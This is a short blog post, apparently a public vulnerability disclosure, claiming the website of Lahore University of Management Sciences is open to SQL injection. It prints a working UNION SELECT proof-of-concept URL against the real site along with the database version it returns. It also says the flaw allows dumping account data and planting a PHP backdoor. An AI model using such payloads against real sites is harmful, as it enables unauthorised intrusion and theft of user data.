Lums.edu.pk is UnSecure
I have found a vulnerability in Lahore University Of Modern Sciences.
I heard it's a top leading University in Pakistan and feel very ashamed due to there unsecure website.
I have notify the university management to secure it.
Proof Of Concept of vulnerabilty.
http://lums.edu.pk/event_detail.php?id=317+and+1=0+union+select+1,2,version()--
This query show's you the MySql version which is installed in there server.
5.0.32-Debian_7etch8-log
There are some other queries also through which an attacker can see there database tables ,columns and dump account's info.
And for some method you can even upload php backdoor and can root server.
I hope they secure there site as soon as possible.
Good Bye.
Posts
Post a Comment